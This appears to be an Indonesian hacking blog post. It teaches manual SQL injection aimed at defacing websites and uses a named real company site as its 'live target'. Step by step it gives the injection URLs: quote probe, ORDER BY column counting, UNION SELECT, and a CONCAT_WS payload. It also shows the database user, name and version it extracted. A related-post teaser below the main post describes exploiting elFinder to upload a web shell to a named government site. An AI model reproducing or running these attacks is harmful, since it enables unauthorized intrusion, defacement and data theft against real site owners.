Skip to main content

Tutorial Deface Dengan Cara SQL Injection Manual

kembali lagi bersama gue admin yg ganteng :v
Setelah sekian lama tidak posting artikel, ya maaf sibuk dengan sekolah ( adminnya masih sekolah gan ), teman, pelajaran , dan yang pasti pacar wwkwk

kali ini gue akan memberikan tutorial Deface Dengan Cara SQL Injection Manual
beberapa bulan lalu gue memberikan tutorial sqli dengan pakai SQLMAP, Nah sekarang gue memberikan caranya dengan cara manual

langsung aja ya gan, sans aja live target udh gue sediakan kok :D

LIVE TARGET : http://garudatransindonesia.com/artikel.php?id=9


1. Untuk inject nya lebih mudah pakai Mozilla firefox + hackbar ya :D

2. Masukkan payload ( ' ) *tanpa tanda kurung , di akhir URL, maka website akan blank, menandakan bahwa web tersebut vuln SQL Injection
http://garudatransindonesia.com/artikel.php?id=9'



3. Selanjutnya beri tanda ( -- - ) di akhir url, contoh seperti ini
http://garudatransindonesia.com/artikel.php?id=9'-- -
Jika web kembali menampilkan artikel secara normal, berarti vuln SQLI



4. Sekarang kita memakai order+by untuk mencari error nya dimana
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+2-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+5-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+6-- - = ERROR / BLANK



5. Karena order by error nya di nomor 6, sekarang kita union select , untuk mencari column nya di nomor berapa beri tanda ( . ) di belakang parameter nya
Union select di nomor 5, karena order by nya error di nomor 6
http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,2,3,4,5-- -


6. Yap udh ketemu ya nomor column nya yaitu di angka 2, sekarang kita mencari tau user, database , dan version nya, caranya? kita beri basic statement di menu hackbar kalian
Atau juga bisa memakai payload ini, taruh di letak angka 2
Payload = CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())

http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5-- -


7, Dan taraaaa, kita sudah mendapatkan user , database , dan version nya


User : u2232528_garudatrans@localhost
Database : u2232528_garuda
Version : 10.2.17-MariaDB

Untuk mencari table tablenya, tinggal hapus aja payload nya, lalu memakai DIOS yang tersedia di hackbar :D

Ok sekian...
Terimaasih sudah berkunjung
Labels:

Comments

Post a Comment

Popular posts from this blog

Benner Online Shop CDR / Toko Online Elegan CDR 100% Free

Benner Online Shop/ Toko Online Elegan 100% Free - Bagi anda yang memiliki toko online/online shop dan bingung untuk membuat bennernya, disini kami sajikan contoh benner online shop. benner online shope yang kami bagikan ini adalah benner yang di desain tim desainer kami untuk anda. contoh ini dapat menjadi referensi. dan jika anda membutuhkan file CDRnya anda dapat mengunduhnya pada link yang admin buat di akhir artikel ini. setelah anda mengunduh file CDRnya silahkan di edit sesuai nama online shop anda dengan menggunkan CorelDraw. Sesuai dengan judul yaitu Benner Online Shop/ Toko Online Elegan CDR 100% Free bahwa kami membagikannya secara gratis. jadi bagi yang berminat silahkan di download. berikut adalah contoh benner online shop yang kami maksud. Contoh 1 benner online Shop Contoh 2 benner online Shop    Contoh 3 benner online Shop Itulah contoh benner online shop yang dapat kami bagikan, kami berharap contoh diatas dapat mewakili kebutuhan anda. jika anda ingin re...
Post a Comment
Read more

Memperbaiki Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema

Memperbaiki Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema Written by Muhamad Hamdan on Wen March 5th 2014 Assalamu'Alaikum Sahabat Semua,Dua Minggu yang lalu kita pernah Membikin Artikel bagaimana cara Memperbaiki Missing required field "updated" Dan hCard "author" Mereka yang telah melihat artikel tadi pasti sudah valid kalau Dia mengikuti petunjuknya,Tetapi walaupun itu sudah valid untuk menggunakan rich snippets untuk google webmasters tools, Sebagian besar suka menemukan Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema di karenakan dari kesalahan property yang bukan schema markup. Nah sekarang untuk melanjutkan dengan cara Memperbaiki Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema Anda perlu bantuan d...
Post a Comment
Read more

Tutorial Deface elFinder + Upload Shell

Naufal Ardhani - Hallo gaess kali ini gua bakal bagiin  Tutorial Deface elFinder + Upload Shell , Exploit ini sudah cukup lama ya tapi masih ada aja website yang masih vuln dengan exploit ini :v dan pas gua lagi Pentest web  http://labuankec.pandeglangkab.go.id/  gua nemuin directory /elFinder/ dan langsung aja gua upload shell dan bugnya dah ditambel. Dork : inurl:elfinder/elfinder.php.html ( dork kembangin lagi ya biar dapet yang vuln ) Exploit : www.site.com/[path] /elfinder/elfinder.php.html Live Target :  http://labuankec.pandeglangkab.go.id/ Step : Dorking di google, pilih target dan kasih exploit satu satu dan Disini gua pake Live Target dan beri exploitnya : https://labuankec.pandeglangkab.go.id/SysAdminBasTek/scripts /elfinder/elfinder.php.html Langsung aja Upload Shell dengan ekstensi .phtml  lalu Akses deh Shellnya di www.site.com/[path] /elfinder/files/oxy.phtml Sekian Tutorial Deface elFinder + Upload Shell semoga bermanfaat ilmunya. nb : saya ...
Post a Comment
Read more